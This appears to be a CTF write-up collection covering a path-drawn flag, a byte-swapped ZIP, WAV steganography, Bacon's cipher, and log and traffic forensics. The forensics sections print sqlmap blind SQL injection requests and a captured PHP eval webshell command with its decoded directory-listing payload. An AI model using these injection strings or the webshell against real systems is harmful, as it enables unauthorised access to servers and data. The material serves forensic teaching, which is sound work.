Up, Down, Left, Right

flag.txt:

DDDDDDDDDRRRRRRDDDDDDDDDDDDDDDDLLLDDDDDDDDDDDLLRRRRLLDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUURRRRRRRUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUURRRRRRRRUUUUUUUUUUULLLLLRRRRRRLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLUUUUUUUUUUUUUURRRRUUUUURRRRRUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDDDRRRRRRLDDDDDDDDDDDDDLLLLLLLRRRRRRRRLUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUUURRLLDDDDDDDDDDDDDDDDDDDDDDLLDDDDRRDDDDDDDDDDDDDDDDDDDDDDDRRLLUUUUUUUUUUUUUUUUUUUUUUULLUUUURRUUUUURRRRRRRRUUUUUUUUUUULLLLLRRRRRRLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLUUUUUUUUUUUUUURRRRUUUUURRRRDDDDDDDDDDDDDDDDDDDDDDRRRRRLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDRRRUUUUUUUUUUUUUUUURRRRLLLLDDDDDDDDDDDDDDDDRRRRDDDDDDDDDDDDDDDDDDDDDDLLLLRRRRUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRRRRRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLRRRRRUUUUUUUUUUUUUUUUUUUUUURRRRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLRRRRRUUUUUUUUUUUUUUUUUUUUUURRUUUUUUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRRRRRRUUUUUUUUUUUUUUUUUUUUULLLRRRDDDDDDDDDDDDDDDDDDDDDDDDRRDDDDLLDDDDDDDDDDDDDDDDDDDDLLL

crack.py:

# encoding: utf-8
from PIL import Image

im = Image.new('RGB', (1000, 1000), 'black')
# Read the letters from flag.txt
with open('flag.txt') as file:
    line = file.readline()
a = [300, 300]  # starting position
# a[0] tracks left/right movement, a[1] tracks up/down movement
for i in line:
    if i == 'D':
        a[1] = a[1] + 1
    if i == 'U':
        a[1] = a[1] - 1
    if i == 'R':
        a[0] = a[0] + 1
    if i == 'L':
        a[0] = a[0] - 1
    im.putpixel(tuple(a), (255, 255, 255))  # putpixel draws at the given coordinate (expects a tuple)
# At first I followed convention and made 'U' add 1, but the picture came out upside down, so 'D' has to be +1
im.show()

The Secret of the Archive

Open the archive directly:


View it in hex:

0000000 504b 0304 1400 0900 0800 d772 554f 9f43
0000010 ce46 3400 0000 2600 0000 0800 0000 666c
0000020 6167 2e74 7874 1cc2 f91a 0f38 037f 62c9
0000030 3bf5 1bed 8553 59ca 7052 4df3 257c 8f4b
0000040 2ac9 a176 c915 0098 aaef bf55 4f06 e3f3
0000050 7c7e 43f8 67e7 dbb1 3a81 504b 0708 9f43
0000060 ce46 3400 0000 2600 0000 504b 0102 1f00
0000070 1400 0900 0800 d772 554f 9f43 ce46 3400
0000080 0000 2600 0000 0800 2400 0000 0000 0000
0000090 2000 0000 0000 0000 666c 6167 2e74 7874
00000a0 0a00 2000 0000 0000 0100 1800 b944 f3f4
00000b0 d787 d501 0439 16c2 5185 d501 0439 16c2
00000c0 5185 d501 504b 0506 0000 0000 0100 0100
00000d0 5a00 0000 6a00 0000 8000 090d 0a20 2020
00000e0 200d 0a20 0d0a 2009 200d 0a20 0d0a 0920
00000f0 2020 2009 0d0a 2020 0d0a 2020 200d 0a09
0000100 2020 2020 090d 0a20 2020 200d 0a20 090d
0000110 0a20 0920 200d 0a20 2009 200d 0a09 2020
0000120 2020 090d 0a20 0909 200d 0a20 0909 0d0a
0000130 0920 200d 0a09 2020 2020 090d 0a20 2020
0000140 0d0a 0920 200d 0a09 200d 0a20 200d 0a20
0000150 2020 0d0a 0920 0920 0d0a 6447 686c 636d
0000160 5574 6158 4d74 6147 4673 5a69 3177 6432
0000170 5174 6332 686c 626e 4e70
000017a

Every pair of bytes is in the wrong order, so write a script that swaps each two bytes back and restores the archive.

S='4B50040300140009000872D74F55439F46CE0034000000260000000800006C666761742E7478C21C1AF9380F7F03C962F53BED1B5385CA595270F34D7C254B8FC92A76A115C99800EFAA55BF064FF3E37E7CF843E767B1DB813A4B500807439F46CE00340000002600004B500201001F00140009000872D74F55439F46CE00340000002600000008002400000000000000200000000000006C666761742E7478000A0020000000000001001844B9F4F387D701D53904C216855101D53904C216855101D54B5006050000000000010001005A0000006A000000800D09200A20200D20200A0A0D09200D20200A0A0D2009202009200A0D20200A0D20200D20090A202020200D09200A20200D20200A0D09200A20090D20200A09200D20090A202020200D09200A09090D20200A09090A0D20090D20090A202020200D09200A20200A0D20090D20090A0D20200A0D20200A20200A0D200920090A0D47646C686D6374555861744D47617346695A77313264745132636C686E62704E'
s1 = ''
# Swap the two bytes (four hex digits) of every 16-bit word
for i in range(len(S) // 4):
    s1 += S[4*i+2]
    s1 += S[4*i+3]
    s1 += S[4*i]
    s1 += S[4*i+1]
print(s1)

Extracting the archive reveals an encrypted flag.txt inside.


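Looking at the hex again, there is a base64 string at the bottom. Decoding it gives a hint with half of the password, shensi. However, this half… is the last 6 characters of the password, not the first 6 (a nasty trap!). From here you can run a mask attack, or simply guess it… Password: sdniscshensi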

flag{5b3fcbb6920490bf4ab156df51c0976c}
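The two steps above (undoing the byte swap, then pulling out whatever follows the archive) can be done on raw bytes instead of a hex string. This is an added example, not the author's script: it locates the end-of-central-directory record, skips the archive comment, and returns the trailing data; the sample file and its hint text are constructed in `build_sample()`.

```python
import base64
import io
import struct
import zipfile


def swap_pairs(data: bytes) -> bytes:
    """Swap every two adjacent bytes; an odd trailing byte stays in place."""
    out = bytearray(data)
    even = len(out) & ~1
    out[0:even:2], out[1:even:2] = out[1:even:2], out[0:even:2]
    return bytes(out)


def split_trailer(zip_bytes: bytes):
    """Split a ZIP into (archive, trailer) at the end of the EOCD record."""
    eocd = zip_bytes.rfind(b"PK\x05\x06")  # end-of-central-directory signature
    if eocd < 0 or eocd + 22 > len(zip_bytes):
        raise ValueError("no end-of-central-directory record found")
    (comment_len,) = struct.unpack_from("<H", zip_bytes, eocd + 20)
    end = eocd + 22 + comment_len  # 22-byte fixed EOCD plus the archive comment
    return zip_bytes[:end], zip_bytes[end:]


def build_sample() -> bytes:
    """Constructed stand-in for the challenge file: ZIP + comment + base64 trailer, pair-swapped."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("flag.txt", "constructed sample content")
        zf.comment = b" \t\r\n" * 4  # whitespace-only comment, like the one in the dump
    hint = base64.b64encode(b"constructed-half-password")
    return swap_pairs(buf.getvalue() + hint)


if __name__ == "__main__":
    restored = swap_pairs(build_sample())
    archive, trailer = split_trailer(restored)
    print(restored[:4], zipfile.ZipFile(io.BytesIO(archive)).namelist())
    print(base64.b64decode(trailer))
```

In the dump above the EOCD comment length field is 0x0080, so the whitespace block is the archive comment and the base64 text is the part that lies outside the archive.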

My Motherland and Me

Analysing the audio shows that the information is hidden at the end.


The lower level is 0, the upper level is 1.

View it in hex:


F0D8 --> 1

1027 --> 0

Solution script:

# encoding: utf-8
f = open('flag.wav', 'rb')
data = f.read()
print(type(data))
strflag = ""
flag = ""
#w=open('flag01.txt','w')
#w.write('0')
# 0x362e4c is the start offset of the hidden data
for i in range(0x362e4c, len(data), 2):
    if data[i] == 0xf0:  # indexing bytes yields an int in Python 3
        strflag += '0'
        #print(0)
        #w.write('0')
    elif data[i] == 0x10:
        strflag += '1'
        #print(1)
        #w.write('1')

f.close()
#w.close()
print(strflag)
for i in range(0, len(strflag), 8):
    chra = int(strflag[i:i+8], 2)
    flag += chr(chra)

print(flag)
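The script above depends on a hand-found offset (0x362e4c). As an added example (not the author's code), the version below parses the WAV samples and finds the start of the hidden block itself by walking back from the end while samples are exactly one of the two levels. It uses the script's mapping (first byte 0x10 is 1, 0xF0 is 0) and assumes 16-bit mono PCM with one sample per bit; the WAV it runs on is constructed in `build_sample()`.

```python
import io
import struct
import wave

HIGH, LOW = 10000, -10000  # little-endian bytes 10 27 and F0 D8, as in the hex view


def read_samples(wav_bytes: bytes):
    """Return the 16-bit PCM samples of a mono WAV as a tuple of ints."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getsampwidth() != 2 or w.getnchannels() != 1:
            raise ValueError("expected 16-bit mono PCM")
        frames = w.readframes(w.getnframes())
    return struct.unpack("<%dh" % (len(frames) // 2), frames)


def decode_tail(samples) -> str:
    """Find the trailing run of HIGH/LOW samples and read it as 8-bit characters."""
    start = len(samples)
    while start > 0 and samples[start - 1] in (HIGH, LOW):
        start -= 1
    bits = "".join("1" if s == HIGH else "0" for s in samples[start:])
    bits = bits[len(bits) % 8:]  # drop stray leading samples so bytes stay aligned
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def build_sample(message: str) -> bytes:
    """Constructed WAV: a sawtooth as cover audio, then one sample per hidden bit."""
    cover = [150 * ((i % 40) - 20) for i in range(400)]
    bits = "".join(format(b, "08b") for b in message.encode("ascii"))
    hidden = [HIGH if bit == "1" else LOW for bit in bits]
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(8000)
        w.writeframes(struct.pack("<%dh" % (len(cover) + len(hidden)), *cover, *hidden))
    return buf.getvalue()


if __name__ == "__main__":
    print(decode_tail(read_samples(build_sample("flag{constructed}"))))
```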


Forensic - Log Analysis

192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E102%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E101%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E96%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E112%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E104%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E108%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E106%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E107%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"

Binary-search (bisection) blind injection.
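For log forensics, the bisection can be replayed to see which characters the requests extracted: each probe asks whether ORD(char) > N, and the response size tells which way the answer went. The following is an added example, not part of the original write-up; the log lines are constructed from a template with an abbreviated subquery, using the (position, threshold, size) values from the excerpt above.

```python
import re
from urllib.parse import unquote

# Constructed lines: same request shape as the log above (subquery abbreviated),
# with the (position, threshold, response size) values taken from that excerpt.
TEMPLATE = ('192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20'
            'ORD%28MID%28%28SELECT%20flag%20FROM%20dvwa.flag%20LIMIT%200%2C1%29%2C{pos}%2C1%29%29'
            '%3E{n}%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 {size} "-" "sqlmap/1.3.10.7#dev"')
OBSERVED = [(1, 96, 209), (1, 112, 215), (1, 104, 215), (1, 100, 209), (1, 102, 215), (1, 101, 209),
            (2, 96, 209), (2, 112, 215), (2, 104, 209), (2, 108, 215), (2, 106, 209), (2, 107, 209)]
SAMPLE_LOG = [TEMPLATE.format(pos=p, n=n, size=s) for p, n, s in OBSERVED]

# After URL-decoding: ...,<pos>,1))><threshold> AND ... HTTP/1.1" <status> <size>
PROBE = re.compile(r',(\d+),1\)\)>(\d+) AND .*?" (\d{3}) (\d+) ')


def parse(lines):
    """Yield (position, threshold, response_size) for each bisection probe."""
    for line in lines:
        m = PROBE.search(unquote(line))
        if m:
            yield int(m[1]), int(m[2]), int(m[4])


def recover(lines, true_size):
    """Rebuild the extracted string, given the response size of a TRUE answer."""
    bounds = {}  # position -> [highest threshold answered TRUE, lowest answered FALSE]
    for pos, n, size in parse(lines):
        b = bounds.setdefault(pos, [-1, 256])
        if size == true_size:
            b[0] = max(b[0], n)  # ORD(ch) > n held
        else:
            b[1] = min(b[1], n)  # ORD(ch) <= n
    # The search has converged on a character when the two bounds are adjacent.
    return "".join(chr(hi) if hi == lo + 1 else "?" for lo, hi in (bounds[p] for p in sorted(bounds)))


def infer_true_size(lines):
    """Pick the response size that makes every position's bounds consistent."""
    sizes = {size for _, _, size in parse(lines)}
    good = [s for s in sorted(sizes) if "?" not in recover(lines, s)]
    return good[0] if len(good) == 1 else None


if __name__ == "__main__":
    print(infer_true_size(SAMPLE_LOG), recover(SAMPLE_LOG, infer_true_size(SAMPLE_LOG)))
```

On the twelve probes shown, a 209-byte response is the TRUE branch and the first two extracted characters are "fl".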

A Simple Cipher

hellO,everyone Are YOU huNGrY woUld you like To eAt BAcon

Bacon's cipher

There are two decoding modes:

  1. Lowercase letters become a, uppercase letters become b
  2. Lowercase letters become A, uppercase letters become B

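# encoding=utf-8
import re
raw = "hellOeveryoneAreYOUhuNGrYwoUldyoulikeToeAtBAcon"

print(raw)
print('Lowercase letters become a, uppercase letters become b: ')
To_a = re.sub(r'[a-z]', 'a', raw)
To_b = re.sub(r'[A-Z]', 'b', To_a)

print(To_b)


print('Lowercase letters become A, uppercase letters become B')
To_A = re.sub(r'[A-Z]', 'B', raw)
To_B = re.sub(r'[a-z]', 'A', To_A)
print(To_B)

# sub replaces the parts of the string that match the pattern
# sub(pattern, repl, string, count=0, flags=0)
# pattern: the regular expression
# repl   : the replacement string or a callable
# string : the string to search
# count  : maximum number of matches to replace
# flags  : matching flags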


letters1 = [
    'A', 'B', 'C', 'D', 'E', 'F', 'G',
    'H', 'I', 'J', 'K', 'L', 'M', 'N',
    'O', 'P', 'Q', 'R', 'S', 'T',
    'U', 'V', 'W', 'X', 'Y', 'Z',
]
letters2 = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g',
    'h', 'i', 'j', 'k', 'l', 'm', 'n',
    'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z',
]
cipher1 = [
    "aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba",
    "aabbb", "abaaa", "abaab", "ababa", "ababb", "abbaa", "abbab",
    "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb",
    "babaa", "babab", "babba", "babbb", "bbaaa", "bbaab",
]
cipher2 = [
    "AAAAA", "AAAAB", "AAABA", "AAABB", "AABAA", "AABAB", "AABBA",
    "AABBB", "ABAAA", "ABAAA", "ABAAB", "ABABA", "ABABB", "ABBAA",
    "ABBAB", "ABBBA", "ABBBB", "BAAAA", "BAAAB", "BAABA",
    "BAABB", "BAABB", "BABAA", "BABAB", "BABBA", "BABBB",
]


def bacon1(string):
    lists = []
    # Split into groups of five
    for i in range(0, len(string), 5):
        lists.append(string[i:i+5])
    # print(lists)
    # Match each group against the table; the index gives the letter
    for i in range(0, len(lists)):
        for j in range(0, 26):
            if lists[i] == cipher1[j]:
                # print(j)
                print(letters1[j], end="")
    print("")


def bacon2(string):
    lists = []
    # Split into groups of five
    for i in range(0, len(string), 5):
        lists.append(string[i:i+5])
    # print(lists)
    # Match each group against the table; the index gives the letter
    for i in range(0, len(lists)):
        for j in range(0, 26):
            if lists[i] == cipher2[j]:
                # print(j)
                print(letters2[j], end="")
    print("")



if __name__ == "__main__":
    bcon1 = input('ab input: ')
    bacon1(bcon1)
    bcon2 = input('AB input: ')
    bacon2(bcon2)


import re


# There are two variants of the Bacon cipher
class Baconian():
    alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
                'v', 'w', 'x', 'y', 'z']
    first_cipher = ["aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba", "aabbb", "abaaa", "abaab", "ababa",
                    "ababb", "abbaa", "abbab", "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb", "babaa", "babab",
                    "babba", "babbb", "bbaaa", "bbaab"]
    second_cipher = ["aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba", "aabbb", "abaaa", "abaaa", "abaab",
                     "ababa", "ababb", "abbaa", "abbab", "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb", "baabb",
                     "babaa", "babab", "babba", "babbb"]

    def __init__(self, text):
        self.text = text

    def decode(self):
        text = self.text.lower()
        str_array = re.findall(".{5}", text)
        decode_str1 = ""
        decode_str2 = ""
        for key in str_array:
            for i in range(0, 26):
                if key == Baconian.first_cipher[i]:
                    decode_str1 += Baconian.alphabet[i]
                if key == Baconian.second_cipher[i]:
                    decode_str2 += Baconian.alphabet[i]
        print(decode_str1)
        print(decode_str2)


if __name__ == '__main__':
    text = 'aaaabaaaaaaaabaabbbaabbabaabaaaaaaabaababbaaa'
    bacon = Baconian(text)
    bacon.decode()

Traffic Analysis

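Looking at the HTTP streams, there are a great many HTTP requests, and it is clear that a directory brute-force is going on. The next step is to find which path was hit successfully; a successful hit returns 200. There are too many streams, though, so first search for suspicious content with http contains "cmd" and open the traffic that matches. After filtering out some useless traffic, tcp.stream eq 76 shows a PHP file that was requested successfully: cmd.php. Filter out the failed requests with http contains "200". In tcp.stream eq 1128 you can see the command execution: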


tcp.stream eq 1354


URL-decode it to take a look:

>>> from urllib import parse
>>> parse.unquote(r'sdnisc=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=L3Zhci93d3cvaHRtbC8%3D')
'sdnisc=@eval\x01(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=L3Zhci93d3cvaHRtbC8='

Decode the contents of z0 and format the result:

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
;
$D=base64_decode($_POST["z1"]);
$F=@opendir($D);
if($F==NULL) {
    echo("ERROR:// Path Not Found Or No Permission!");
} else {
    $M=NULL;
    $L=NULL;
    while($N=@readdir($F)) { // iterate over the entries in the directory
        $P=$D."/".$N;
        $T=@date("Y-m-d H:i:s",@filemtime($P));
        @$E=substr(base_convert(@fileperms($P),10,8),-4); // file name and permissions
        $R="\t".$T."\t".@filesize($P)."\t".$E."
";
        if(@is_dir($P))$M.=$N."/".$R; else $L.=$N.$R;
    }
    echo $M.$L;
    @closedir($F);
}
;
echo("|<-");
die();